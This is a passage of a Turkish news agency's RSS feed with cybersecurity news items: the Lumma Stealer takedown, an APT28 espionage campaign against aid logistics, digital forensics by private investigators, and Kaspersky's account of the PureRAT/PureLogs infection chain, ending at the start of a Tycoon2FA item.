<p data-start="2082" data-end="2435"><strong data-start="2082" data-end="2119">Otomasyon açığı neden kapanmıyor?</strong><br data-start="2119" data-end="2122">Araştırmaya göre, uygulama yığını hızla büyürken altyapı dağınık kaldı. Şirketlerin kullandığı birçok uygulama, modern kimlik standartlarıyla entegre olamıyor. Bu da geçici çözümler ve manuel müdahaleleri kalıcı hale getiriyor. Parola yöneticileri ve komut dosyaları gibi araçlar ise sürdürülebilir olmaktan uzak.</p>
<p data-start="2437" data-end="2711"><strong data-start="2437" data-end="2476">Yapay zekâ destekli çözümler kapıda</strong><br data-start="2476" data-end="2479">Cerby, otomasyon açığını kapatmak için yapay zekâ destekli hibrit çözümler öneriyor. Güvenlik liderlerinin %78’i yapay zekânın tüm süreci tek başına devralmasına henüz güvenmese de %45’i insan destekli otomasyon modelini benimsiyor.</p>
<p data-start="2713" data-end="2927"><strong data-start="2713" data-end="2725"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>FBI ve Europol&amp;apos;den küresel siber operasyon: 10 milyon cihazı etkileyen Lumma Stealer ağı çökertildi</title>
<link>https://www.ajansexpres.com.tr/fbi-ve-europolden-kuresel-siber-operasyon-10-milyon-cihazi-etkileyen-lumma-stealer-agi-coekertildi</link>
<guid>https://www.ajansexpres.com.tr/fbi-ve-europolden-kuresel-siber-operasyon-10-milyon-cihazi-etkileyen-lumma-stealer-agi-coekertildi</guid>
<description><![CDATA[ ABD Adalet Bakanlığı, FBI, Europol ve özel sektör iş birliğiyle yürütülen operasyon sonucu 2.300 komuta kontrol alan adı ele geçirildi. Lumma Stealer isimli kötü amaçlı yazılım, dünya genelinde milyonlarca bilgisayarı hedef alarak kritik bilgileri çalıyordu. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_6894847f558fe.webp" length="25460" type="image/jpeg"/>
<pubDate>Thu, 07 Aug 2025 13:48:31 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Lumma Stealer nedir, kaç cihaza bulaştı, FBI ve Europol operasyonu ne zaman düzenledi, geliştiricisinin kimliği ne</media:keywords>
<content:encoded><![CDATA[<p><br data-start="412" data-end="415"><strong data-start="415" data-end="474">10 milyon cihazı etkileyen zararlı yazılıma büyük darbe</strong><br data-start="474" data-end="477">ABD Federal Soruşturma Bürosu (FBI), Europol ve çok sayıda özel sektör siber güvenlik firmasının koordineli çalışması sonucu, Lumma (diğer adıyla LummaC veya LummaC2) isimli bilgi çalan kötü amaçlı yazılımın dijital altyapısı çökertildi. Operasyon kapsamında 2.300 alan adı ele geçirilerek Lumma'nın komuta ve kontrol ağı devre dışı bırakıldı.</p>
<p></p>
<p data-start="822" data-end="1195"><strong data-start="822" data-end="877">Hedef: Şifreler, kripto paralar ve kişisel bilgiler</strong><br data-start="877" data-end="880">ABD Adalet Bakanlığı tarafından yapılan açıklamada, Lumma gibi kötü amaçlı yazılımların milyonlarca kullanıcının oturum bilgilerini çalarak banka dolandırıcılığı ve kripto para hırsızlığı gibi suçlarda kullanıldığı belirtildi. Sadece FBI, Lumma yazılımının 10 milyondan fazla enfeksiyona neden olduğunu tespit etti.</p>
<p data-start="1197" data-end="1603"><strong data-start="1197" data-end="1247">Microsoft 394 binden fazla bulaşma tespit etti</strong><br data-start="1247" data-end="1250">Europol, 16 Mart ile 16 Mayıs 2025 tarihleri arasında Microsoft’un dünya genelinde 394.000 Windows bilgisayarın Lumma ile enfekte olduğunu belirlediğini aktardı. Operasyonun, kötü amaçlı yazılım ile kullanıcılar arasındaki iletişimi tamamen kestiği vurgulandı. Lumma, Europol tarafından ‘dünyanın en büyük bilgi çalan yazılım tehdidi’ olarak tanımlandı.</p>
<p data-start="1605" data-end="2090"><strong data-start="1605" data-end="1635">Arkasındaki isim: 'Shamel'</strong><br data-start="1635" data-end="1638">Microsoft Dijital Suçlar Birimi (DCU), ESET, BitSight, Lumen, Cloudflare, CleanDNS ve GMO Registry gibi firmalarla iş birliği yaptı. Lumma’nın geliştiricisinin 'Shamel' takma adını kullanan Rus bir kişi olduğu, Telegram gibi platformlarda yazılımı farklı seviyelerde hizmet paketleriyle pazarladığı tespit edildi. Yazılımın fiyatları 250 dolardan başlayıp 20.000 dolara kadar çıkıyor. En pahalı paket, kaynak kod erişimi ve yeniden satış hakkı sunuyor.</p>
<p data-start="2092" data-end="2551"><strong data-start="2092" data-end="2142">Sürekli evrilen altyapı ve gizlenme teknikleri</strong><br data-start="2142" data-end="2145">ESET, yazılımın farklı kullanıcılar için özelleştirilebilir yapıda olduğunu, gelişmiş tespit önleme sistemlerine ve sahte yazılım paketleriyle yayılma stratejilerine sahip olduğunu belirtti. Lumma, genellikle sahte yazılım indirme siteleri, tıklama tuzakları ve reklam ağları aracılığıyla yayılıyor. Microsoft, yazılımın yayılmasında Prometheus gibi trafik dağıtım sistemlerinin kullanıldığını da açıkladı.</p>
<p data-start="2553" data-end="2945"><strong data-start="2553" data-end="2593">Cloudflare: İş yapamaz hale geldiler</strong><br data-start="2593" data-end="2596">Cloudflare, kötü niyetli alan adlarına bir uyarı sayfası yerleştirildiğini ve bu alan adlarını kontrol eden hesaplara karşı da işlem başlatıldığını açıkladı. Cloudforce One yetkilisi Blake Darché, yapılan müdahaleyle Lumma operatörlerinin para kazanma yeteneklerinin engellendiğini ve operasyonlarının ciddi şekilde sekteye uğratıldığını ifade etti.</p>
<p data-start="2947" data-end="3266"><strong data-start="2947" data-end="2974">Geri dönmeleri muhtemel</strong><br data-start="2974" data-end="2977">Uzmanlar, Lumma operasyonunun büyük oranda sekteye uğratıldığını ancak tehdit aktörlerinin taktik değiştirerek yeniden faaliyet göstermeye çalışacaklarını belirtiyor. Lumma geliştiricisi Ocak 2025’te yaptığı açıklamada, sonbaharda operasyonlarını sonlandırmayı planladıklarını belirtmişti.</p>
<p data-start="3268" data-end="3401"><strong data-start="3268" data-end="3280"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Sanal Dedektifler Dijital İz Peşinde: Özel Araştırmacılar Siber Delilleri Nasıl Topluyor?</title>
<link>https://www.ajansexpres.com.tr/sanal-dedektifler-dijital-iz-pesinde-ozel-arastirmacilar-siber-delilleri-nasil-topluyor</link>
<guid>https://www.ajansexpres.com.tr/sanal-dedektifler-dijital-iz-pesinde-ozel-arastirmacilar-siber-delilleri-nasil-topluyor</guid>
<description><![CDATA[ Siber suçlar, aldatma şüpheleri, veri sızıntıları ya da tehditkar mesajlar… Özel dedektifler artık yalnızca fiziksel gözetimle değil, dijital adli bilişim teknikleriyle de devreye giriyor. Peki telefonlardaki, sosyal medya hesaplarındaki ve hatta silinmiş dosyalardaki sırlar nasıl ortaya çıkıyor? ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_6894847aeabef.webp" length="20976" type="image/jpeg"/>
<pubDate>Thu, 07 Aug 2025 13:48:26 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Dijital adli bilişim nedir, özel dedektifler bu süreçte hangi araçları kullanır, hangi durumlarda dijital delil toplanır, özel dedektifler yasal sınırlar içinde nasıl hareket eder</media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="443" data-end="766"><strong data-start="443" data-end="490">Dijital Verilerin Arasındaki Gerçeği Aramak</strong><br data-start="490" data-end="493">Günümüz dünyasında neredeyse her olayın izi dijital ortamda bir şekilde saklanıyor. Metin mesajları, e-postalar, sosyal medya hareketleri, silinmiş dosyalar… Her biri, çözülmesi gereken bir bilmecenin parçası olabilir. İşte bu noktada devreye dijital adli bilişim giriyor.</p>
<p data-start="768" data-end="1289"><strong data-start="768" data-end="799">Dijital Adli Bilişim Nedir?</strong><br data-start="799" data-end="802">Dijital adli bilişim, elektronik cihazlardan veri toplama, bu verileri analiz etme ve gerektiğinde yasal süreçlerde kullanılabilecek şekilde raporlama sürecidir. Bilgisayarlar, cep telefonları, sabit diskler, bulut depoları ve sosyal medya hesapları gibi dijital kaynaklar analiz edilir. Sadece görünen veriler değil; silinmiş mesajlar, geçmiş konum verileri, tarayıcı geçmişleri ve gizlenmiş dosyalar da bu kapsamda incelenir. Amaç, bu dijital ipuçlarını delil niteliğinde kullanmaktır.</p>
<p data-start="1291" data-end="1813"><strong data-start="1291" data-end="1323">Özel Dedektiflerin Yeni Yüzü</strong><br data-start="1323" data-end="1326">Geçmişin trençkotlu, kamera taşıyan dedektiflerinin yerini artık ekran başında çalışan, karmaşık veri analizleri yapan profesyoneller aldı. Bugünün özel dedektifleri; hukuka uygun şekilde hareket eder, detaylı döküm hazırlar, çevrimiçi davranışları takip eder ve büyük resme odaklanır. Geleneksel kolluk kuvvetlerinden farklı olarak birebir çalışırlar; aldatma vakalarından iş yerindeki veri sızıntılarına, çevrimiçi tehditlerden sahte profillere kadar çok sayıda konuda hizmet verirler.</p>
<p data-start="1815" data-end="1942"><strong data-start="1815" data-end="1874">Dijital Adli İncelemelerin Kullanıldığı Başlıca Alanlar</strong><br data-start="1874" data-end="1877">Bu tür tekniklerin kullanıldığı bazı yaygın senaryolar şunlardır:</p>
<ul data-start="1943" data-end="2287">
<li data-start="1943" data-end="2036">
<p data-start="1945" data-end="2036"><strong data-start="1945" data-end="1973">İlişki ve Aile Davaları:</strong> Aldatma şüphesi, gizli hesaplar, çocukların dijital güvenliği.</p>
</li>
<li data-start="2037" data-end="2125">
<p data-start="2039" data-end="2125"><strong data-start="2039" data-end="2063">İşyeri İncelemeleri:</strong> Gizli veri sızıntıları, şirket cihazlarının kötüye kullanımı.</p>
</li>
<li data-start="2126" data-end="2208">
<p data-start="2128" data-end="2208"><strong data-start="2128" data-end="2145">Siber Suçlar:</strong> Sahte sosyal medya hesapları, tehdit mesajları, dijital takip.</p>
</li>
<li data-start="2209" data-end="2287">
<p data-start="2211" data-end="2287"><strong data-start="2211" data-end="2233">Boşanma Süreçleri:</strong> Gizlenmiş banka hesapları, maddi varlıkların tespiti.</p>
</li>
</ul>
<p data-start="2289" data-end="2369">Bu tür durumlarda dijital veriler, şüpheleri doğrulayan sessiz tanıklar gibidir.</p>
<p data-start="2371" data-end="2500"><strong data-start="2371" data-end="2409">Kullandıkları Araçlar ve Teknikler</strong><br data-start="2409" data-end="2412">Özel dedektiflerin dijital adli incelemelerde kullandığı bazı başlıca araçlar şunlardır:</p>
<ul data-start="2501" data-end="2849">
<li data-start="2501" data-end="2522">
<p data-start="2503" data-end="2522">GPS takip kayıtları</p>
</li>
<li data-start="2523" data-end="2553">
<p data-start="2525" data-end="2553">Sosyal medya analiz araçları</p>
</li>
<li data-start="2554" data-end="2584">
<p data-start="2556" data-end="2584">Adli görüntüleme yazılımları</p>
</li>
<li data-start="2585" data-end="2622">
<p data-start="2587" data-end="2622">Silinmiş dosya kurtarma programları</p>
</li>
<li data-start="2623" data-end="2849">
<p data-start="2625" data-end="2849">Anahtar kelime tarama sistemleri<br data-start="2657" data-end="2660">Bazı uzmanlar yapay zeka destekli yüz tanıma yazılımları ya da deepfake analiz sistemleri de kullanabilir. Ancak bu araçlar doğru şekilde kullanılmadığında hukuki geçerliliğini yitirebilir.</p>
</li>
</ul>
<p data-start="2851" data-end="2963"><strong data-start="2851" data-end="2895">Adım Adım Dijital Adli Soruşturma Süreci</strong><br data-start="2895" data-end="2898">Bir dijital adli inceleme süreci genellikle şu adımlarla ilerler:</p>
<ol data-start="2964" data-end="3374">
<li data-start="2964" data-end="3036">
<p data-start="2967" data-end="3036"><strong data-start="2967" data-end="2983">İlk danışma:</strong> Olay hakkında bilgi toplanır ve hedefler belirlenir.</p>
</li>
<li data-start="3037" data-end="3109">
<p data-start="3040" data-end="3109"><strong data-start="3040" data-end="3062">Cihazların temini:</strong> İlgili cihazlara yasal izinle erişim sağlanır.</p>
</li>
<li data-start="3110" data-end="3190">
<p data-start="3113" data-end="3190"><strong data-start="3113" data-end="3132">Veri yedekleme:</strong> Orijinal veriye zarar verilmeden birebir kopyalar alınır.</p>
</li>
<li data-start="3191" data-end="3279">
<p data-start="3194" data-end="3279"><strong data-start="3194" data-end="3205">Analiz:</strong> Mesajlar, geçmiş kayıtları, silinmiş içerikler ve daha fazlası incelenir.</p>
</li>
<li data-start="3280" data-end="3374">
<p data-start="3283" data-end="3374"><strong data-start="3283" data-end="3297">Raporlama:</strong> Tüm bulgular zaman damgası ve görsellerle birlikte rapor haline getirilir.</p>
</li>
</ol>
<p data-start="3376" data-end="3770"><strong data-start="3376" data-end="3422">Yasal Sınırlar İçinde Kalmak Neden Önemli?</strong><br data-start="3422" data-end="3425">Bu alanda çalışan uzmanlar, yasal sınırların dışına çıkmadan veri toplamaya özen gösterir. Özel dedektifler; kişisel gizlilik yasalarına uyar, cihazlara yalnızca yazılı izinle erişir, yetkisiz takip veya dinleme işlemlerinden kaçınır ve her adımı belgelendirir. Aksi halde elde edilen veriler hem geçersiz sayılır hem de yasal sorun doğurabilir.</p>
<p data-start="3772" data-end="4179"><strong data-start="3772" data-end="3806">Neden Profesyonel Yardım Şart?</strong><br data-start="3806" data-end="3809">Her ne kadar teknolojiye hakim bireyler kendi araştırmalarını yapabileceğini düşünse de, dijital adli bilişim uzmanları hem teknik bilgiye hem de hukuk bilgisine sahiptir. Bilgilerin yanlışlıkla silinmesi, sürecin geçersiz hale gelmesi gibi riskleri ortadan kaldırırlar. Bu nedenle özel dedektif desteği, çoğu zaman sürecin güvenli ve yasal şekilde yürütülmesini sağlar.</p>
<p data-start="4181" data-end="4377"><strong data-start="4181" data-end="4193"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Rusya’ya bağlı hackerlar NATO ülkelerinin yardım lojistik ağlarını hedef alıyor</title>
<link>https://www.ajansexpres.com.tr/rusyaya-bagli-hackerlar-nato-ulkelerinin-yardim-lojistik-aglarini-hedef-aliyor</link>
<guid>https://www.ajansexpres.com.tr/rusyaya-bagli-hackerlar-nato-ulkelerinin-yardim-lojistik-aglarini-hedef-aliyor</guid>
<description><![CDATA[ Rus askeri istihbarat birimine bağlı APT28 adlı hacker grubu, Ukrayna’ya gönderilen yardımların koordinasyonu ve teslimatında görev alan Batılı lojistik ve teknoloji şirketlerine yönelik geniş çaplı bir siber casusluk kampanyası yürütüyor. Kampanya, çok sayıda ülkenin resmi kurumları tarafından ortak açıklamayla ifşa edildi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_6894847634b22.webp" length="26240" type="image/jpeg"/>
<pubDate>Thu, 07 Aug 2025 13:48:22 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>APT28 hangi ülkeleri hedef aldı, kullanılan saldırı yöntemleri neler, hedeflenen kuruluşlar arasında kimler var, Ukrayna yardımları neden hedefte</media:keywords>
<content:encoded><![CDATA[<p><br data-start="458" data-end="461"><strong data-start="461" data-end="515">Devlet destekli hacker grubu APT28 yeniden sahnede</strong><br data-start="515" data-end="518">Rusya Genelkurmay Başkanlığı Ana İstihbarat Müdürlüğü'ne (GRU) bağlı 26165 No’lu Askeri Birlik tarafından desteklendiği belirtilen APT28 (diğer adlarıyla BlueDelta, Fancy Bear, Forest Blizzard), Batılı devletlerin Ukrayna’ya sağladığı yardımların koordinasyonu, taşınması ve teslimatına dair bilgileri toplamak amacıyla kapsamlı bir siber casusluk kampanyası başlattı.</p>
<p></p>
<p data-start="888" data-end="1377"><strong data-start="888" data-end="936">Hedefte NATO üyeleri ve lojistik zinciri var</strong><br data-start="936" data-end="939">Avustralya, Kanada, Çekya, Danimarka, Estonya, Fransa, Almanya, Hollanda, Polonya, Birleşik Krallık ve ABD gibi ülkelerin resmi kurumları tarafından yayımlanan ortak uyarıya göre, APT28 özellikle savunma, ulaştırma, denizcilik, hava trafiği yönetimi ve bilgi teknolojileri alanlarında faaliyet gösteren kuruluşları hedef aldı. Etkilenen ülkeler arasında Bulgaristan, Yunanistan, İtalya, Moldova, Romanya, Slovakya ve Ukrayna da bulunuyor.</p>
<p data-start="1379" data-end="1891"><strong data-start="1379" data-end="1447">Saldırı yöntemleri: E-posta açıklarından VPN zafiyetlerine kadar</strong><br data-start="1447" data-end="1450">Kampanyada kullanılan yöntemler arasında parola püskürtme, hedefli kimlik avı saldırıları, Microsoft Exchange sistemlerinde posta kutusu izinlerinin değiştirilmesi, Outlook ve Roundcube gibi e-posta servislerindeki güvenlik açıklarının istismarı öne çıkıyor. Ayrıca kurumsal VPN sistemlerine yönelik SQL enjeksiyonu saldırıları da dikkat çekiyor. Özellikle CVE-2023-23397 ve CVE-2023-38831 gibi kritik zafiyetler üzerinden erişim sağlanıyor.</p>
<p data-start="1893" data-end="2406"><strong data-start="1893" data-end="1938">Tehdit sonrası faaliyetler daha tehlikeli</strong><br data-start="1938" data-end="1941">Saldırganlar sisteme giriş yaptıktan sonra, ulaşım koordinasyonundan sorumlu personeli ve mağdur kuruluşlarla işbirliği yapan şirketleri belirlemeye yönelik keşif çalışmaları yapıyor. İç ağlarda yanal hareket sağlamak için Impacket, PsExec ve RDP gibi araçlar, Active Directory’den bilgi sızdırmak içinse Certipy ve ADExplorer.exe kullanılıyor. Ayrıca Office 365 kullanıcı listelerini çıkarmak ve sürekli e-posta takibi için posta kutusu izinleri manipüle ediliyor.</p>
<p data-start="2408" data-end="2833"><strong data-start="2408" data-end="2455">Fransa ve ESET’ten ayrı ayrı uyarılar geldi</strong><br data-start="2455" data-end="2458">Fransa Dışişleri Bakanlığı, APT28’i 2021’den bu yana ülkenin çeşitli kurumlarına yönelik istikrarsızlaştırıcı siber saldırılar düzenlemekle suçlamıştı. Öte yandan ESET tarafından geçtiğimiz hafta duyurulan Operation RoundPress kapsamında, grup Roundcube, Horde ve Zimbra gibi e-posta servislerini kullanarak Doğu Avrupa, Afrika ve Güney Amerika’daki hükümetleri hedef alıyor.</p>
<p data-start="2835" data-end="3297"><strong data-start="2835" data-end="2868">Gözler internet kameralarında</strong><br data-start="2868" data-end="2871">Ajanslara göre, Rus askeri istihbarat biriminin hedefleri yalnızca dijital sistemlerle sınırlı değil. Ukrayna sınır kapılarındaki internet bağlantılı kameralar da bu izleme faaliyetlerinin bir parçası olarak hedef alınıyor. HeadLace, MASEPIE, OCEANMAP ve STEELHOOK gibi kötü amaçlı yazılım aileleriyle veri sızdırma faaliyetlerinin sürdüğü, verilerin PowerShell komutları ve IMAP protokolü aracılığıyla aktarıldığı bildirildi.</p>
<p data-start="3299" data-end="3461"><strong data-start="3299" data-end="3311"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Microsoft 2.300 Alan Adını Ele Geçirdi: Lumma Stealer Ağı Küresel Operasyonla Çökertildi</title>
<link>https://www.ajansexpres.com.tr/microsoft-2300-alan-adini-ele-gecirdi-lumma-stealer-agi-kuresel-operasyonla-coekertildi</link>
<guid>https://www.ajansexpres.com.tr/microsoft-2300-alan-adini-ele-gecirdi-lumma-stealer-agi-kuresel-operasyonla-coekertildi</guid>
<description><![CDATA[ Microsoft, Europol ve ABD Adalet Bakanlığı’nın desteğiyle yürütülen kapsamlı bir operasyon sonucu, dünya genelinde 400.000 cihaza bulaşan ve kimlik hırsızlığına neden olan Lumma Stealer isimli kötü amaçlı yazılımın altyapısını çökertti. 2.300’den fazla alan adı ele geçirildi, Lumma ile bağlantılı Telegram hesabı da kapatıldı. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_689484722206a.webp" length="13594" type="image/jpeg"/>
<pubDate>Thu, 07 Aug 2025 13:48:18 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Lumma Stealer nedir, kaç alan adı ele geçirildi, hangi kurumlar operasyona katıldı, kullanıcılar kendilerini nasıl koruyabilir</media:keywords>
<content:encoded><![CDATA[<p><br data-start="468" data-end="471"><strong data-start="471" data-end="520">Microsoft'tan küresel kötü yazılım operasyonu</strong><br data-start="520" data-end="523">Microsoft, ABD Adalet Bakanlığı, Europol ve çeşitli özel sektör siber güvenlik şirketleriyle birlikte yürüttüğü küresel bir operasyonla, Lumma Stealer isimli kötü amaçlı yazılımın altyapısını çökertti. 2022 yılından bu yana yeraltı forumlarında pazarlanan Lumma, siber suçlulara şifre, kredi kartı bilgisi, kripto cüzdan erişimi ve bankacılık kimlik bilgilerini çalma imkânı sunuyordu.</p>
<p></p>
<p data-start="910" data-end="1331"><strong data-start="910" data-end="949">400 binden fazla cihaz hedef alındı</strong><br data-start="949" data-end="952">Lumma Stealer, dünya çapında yaklaşık 400.000 Windows cihazına bulaşarak yaygın kimlik hırsızlığı ve dolandırıcılık faaliyetlerine aracılık etti. Araç; kimlik avı e-postaları, kötü amaçlı reklamlar ve sahte yükleyiciler yoluyla yayılıyordu. Hatta bu yılın başlarında bir kampanyada saldırganlar, Booking.com’un taklidiyle kullanıcıları zararlı dosyaları indirmeye yönlendirmişti.</p>
<p data-start="1333" data-end="1794"><strong data-start="1333" data-end="1375">2.300’den fazla alan adı ele geçirildi</strong><br data-start="1375" data-end="1378">Microsoft’un Dijital Suçlar Birimi (DCU) tarafından yürütülen çalışma sonucunda, Lumma Stealer ile ilişkili 2.300’den fazla alan adı ele geçirildi. ABD'nin Georgia eyaletindeki Kuzey Bölge Mahkemesi’nden alınan karar doğrultusunda yapılan bu müdahaleyle, kötü yazılımın komuta ve kontrol altyapısı devre dışı bırakıldı. Ele geçirilen alan adları, şu anda Microsoft’un kontrolündeki sunuculara yönlendirilmiş durumda.</p>
<p data-start="1796" data-end="2231"><strong data-start="1796" data-end="1842">Lumma Stealer 'abonelik' modeliyle satıldı</strong><br data-start="1842" data-end="1845">Lumma, yalnızca bir kötü yazılım değil, aynı zamanda ticari bir yapıydı. Farklı abonelik paketleriyle satışa sunulan yazılım, temel sürümü için 250 dolardan, tüm kaynak koduna erişim için 20.000 dolara kadar fiyatlandırılıyordu. Yazılımın geliştiricisi olduğu bilinen ve “Shamel” takma adını kullanan kişi, 2023 yılında verdiği bir röportajda 400 aktif müşterisi olduğunu iddia etmişti.</p>
<p data-start="2233" data-end="2629"><strong data-start="2233" data-end="2268">Uluslararası iş birliği vurgusu</strong><br data-start="2268" data-end="2271">Operasyona destek veren kuruluşlar arasında ESET, Cloudflare, Lumen, CleanDNS, BitSight ve GMO Registry gibi önemli siber güvenlik firmaları da yer aldı. Black Duck firmasında görev yapan Altyapı Güvenliği Direktörü Thomas Richards, 'Kolluk kuvvetleri ve özel sektör iş birliğinin ne kadar etkili olabileceğini gösteren bir örnek' değerlendirmesinde bulundu.</p>
<p data-start="2631" data-end="2992"><strong data-start="2631" data-end="2663">Siber tehditler devam ediyor</strong><br data-start="2663" data-end="2666">Uzmanlara göre Lumma operasyonunun başarılı olması, kötü amaçlı yazılımlara karşı savaşın kazanıldığı anlamına gelmiyor. Microsoft, kullanıcıları e-posta eklerine karşı dikkatli olmaya, güvenilir antivirüs çözümleri kullanmaya, sistem güncellemelerini ihmal etmemeye ve çok faktörlü kimlik doğrulamayı etkinleştirmeye çağırdı.</p>
<p data-start="2994" data-end="3137"><strong data-start="2994" data-end="3006"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Rus Şirketleri Hedefte: PureRAT Zararlısı 2025&amp;apos;te 4 Kat Arttı, Yeni Tehdit PureLogs ile Genişliyor</title>
<link>https://www.ajansexpres.com.tr/rus-sirketleri-hedefte-purerat-zararlisi-2025te-4-kat-artti-yeni-tehdit-purelogs-ile-genisliyor</link>
<guid>https://www.ajansexpres.com.tr/rus-sirketleri-hedefte-purerat-zararlisi-2025te-4-kat-artti-yeni-tehdit-purelogs-ile-genisliyor</guid>
<description><![CDATA[ Kaspersky&#039;nin tespitlerine göre, Rus şirketlerini hedef alan PureRAT tabanlı siber saldırılar 2025&#039;in ilk çeyreğinde geçen yıla göre dört kat arttı. PureLogs adlı bilgi hırsızı ile desteklenen saldırılar, kimlik avı e-postalarıyla başlıyor ve tam sistem kontrolüne kadar ilerliyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_6894846d9f5a6.webp" length="53830" type="image/jpeg"/>
<pubDate>Thu, 07 Aug 2025 13:48:13 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>PureRAT nedir, saldırılar nasıl başlatılıyor, PureLogs hangi bilgileri çalabiliyor, Rus şirketleri neden hedef alınıyor</media:keywords>
<content:encoded><![CDATA[<p><br data-start="436" data-end="439"><strong data-start="439" data-end="469">Kaspersky'den kritik uyarı</strong><br data-start="469" data-end="472">Siber güvenlik firması Kaspersky, Rus şirketlerini hedef alan yeni bir kimlik avı kampanyasıyla ilgili dikkat çeken bir rapor yayımladı. Rapora göre, PureRAT adlı kötü amaçlı yazılım, 2025'in ilk çeyreğinde, 2024'ün aynı dönemine kıyasla dört kat daha fazla saldırıda kullanıldı.</p>
<p></p>
<p data-start="755" data-end="1140"><strong data-start="755" data-end="791">Saldırı zinciri nasıl ilerliyor?</strong><br data-start="791" data-end="794">Kampanya, kullanıcılara gönderilen bir e-postada, RAR arşivi gibi görünen ve çift uzantı taşıyan ("doc_054_[düzenlendi].pdf.rar") dosyalarla başlıyor. Arşiv dosyasının içindeki zararlı yazılım, çalıştırıldığında kendisini Windows sistem dizinine 'task.exe' adıyla kopyalıyor ve otomatik çalıştırma için 'Task.vbs' adında bir script oluşturuyor.</p>
<p data-start="1142" data-end="1487">Bu süreçte 'task.exe', bir diğer çalıştırılabilir dosya olan 'ckcfb.exe'yi aktive ediyor ve ardından 'InstallUtil.exe' isimli sistem yardımcı programını devreye alarak zararlı modülü enjekte ediyor. 'Ckcfb.exe', içerisinde PureRAT zararlısının ana yükünü taşıyan 'Spydgozoi.dll' adlı DLL dosyasını çıkarıyor ve sistem üzerinde kontrol kuruyor.</p>
<p data-start="1489" data-end="1806"><strong data-start="1489" data-end="1525">Kontrol sunucusuna veri aktarımı</strong><br data-start="1525" data-end="1528">PureRAT, uzaktaki komut ve kontrol (C2) sunucusuyla SSL üzerinden bağlantı kuruyor. Sistemde kurulu antivirüs programları, bilgisayar adı ve sistemin çalışma süresi gibi detayları toplayarak sunucuya iletiyor. Bu sayede sunucu, sisteme çeşitli zararlı komutlar gönderebiliyor.</p>
<p data-start="1808" data-end="2039">Kullanılan modüller arasında kendini silme, sistemi yeniden başlatma, açık pencere başlıklarına göre izleme yapma, yetkisiz para transferlerini tetikleme ve panodaki kripto cüzdan adreslerini değiştirme gibi yetenekler bulunuyor.</p>
<p data-start="2041" data-end="2324"><strong data-start="2041" data-end="2074">PureLogs ile bilgi hırsızlığı</strong><br data-start="2074" data-end="2077">Saldırganlar, PureRAT ile birlikte PureLogs adlı bir bilgi hırsızı modülünü de kullanıyor. Bu modül, web tarayıcıları, e-posta istemcileri, parola yöneticileri, kripto cüzdanlar ve FTP yazılımları gibi çok sayıda uygulamadan veri toplayabiliyor.</p>
<p data-start="2326" data-end="2639"><strong data-start="2326" data-end="2365">StilKrip ve Ttcxxewxtly.exe zinciri</strong><br data-start="2365" data-end="2368">PureCrypter olarak bilinen "StilKrip.exe" adlı indirici yazılım da saldırılarda kullanılıyor. Bu yazılım, "Bghwwhmlr.wav" adında bir dosya indirerek zincirin sonraki adımlarını başlatıyor. Nihayetinde, "Ttcxxewxtly.exe" adlı yürütülebilir dosya ile PureLogs yükleniyor.</p>
<p data-start="2641" data-end="2833">Kaspersky, PureRAT ve PureLogs'un birlikte kullanımının, saldırganlara hedef sistem üzerinde tam yetki sağladığını ve hassas kurumsal verilerin tehlikeye girmesine neden olduğunu belirtiyor.</p>
<p data-start="2835" data-end="2973"><strong data-start="2835" data-end="2847"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Kurumsal Ağlara Sessizce Sızan Yeni Tehdit: &amp;apos;Tycoon2FA&amp;apos; ile Gelişmiş Kimlik Avı Saldırıları Nasıl Tespit Edilir?</title>
<link>https://www.ajansexpres.com.tr/kurumsal-aglara-sessizce-sizan-yeni-tehdit-tycoon2fa-ile-gelismis-kimlik-avi-saldirilari-nasil-tespit-edilir</link>
<guid>https://www.ajansexpres.com.tr/kurumsal-aglara-sessizce-sizan-yeni-tehdit-tycoon2fa-ile-gelismis-kimlik-avi-saldirilari-nasil-tespit-edilir</guid>
<description><![CDATA[ Tek bir e-posta ile tüm ağı ele geçirebilen yeni nesil kimlik avı saldırıları, artık otomatik çözümlerle yakalanamıyor. Tycoon2FA örneği üzerinden, saldırı zincirinin tamamının nasıl açığa çıkarılabileceği ve SOC ekiplerinin bu saldırılara karşı saniyeler içinde nasıl önlem alabileceği adım adım anlatıldı. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68948468508a1.webp" length="47130" type="image/jpeg"/>
<pubDate>Thu, 07 Aug 2025 13:48:08 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Tycoon2FA nedir, kimlik avı saldırısı nasıl tespit edilir, sandbox analizi nasıl yapılır, IOC verileri nasıl toplanır ve kullanılır</media:keywords>
<content:encoded><![CDATA[<p></p>
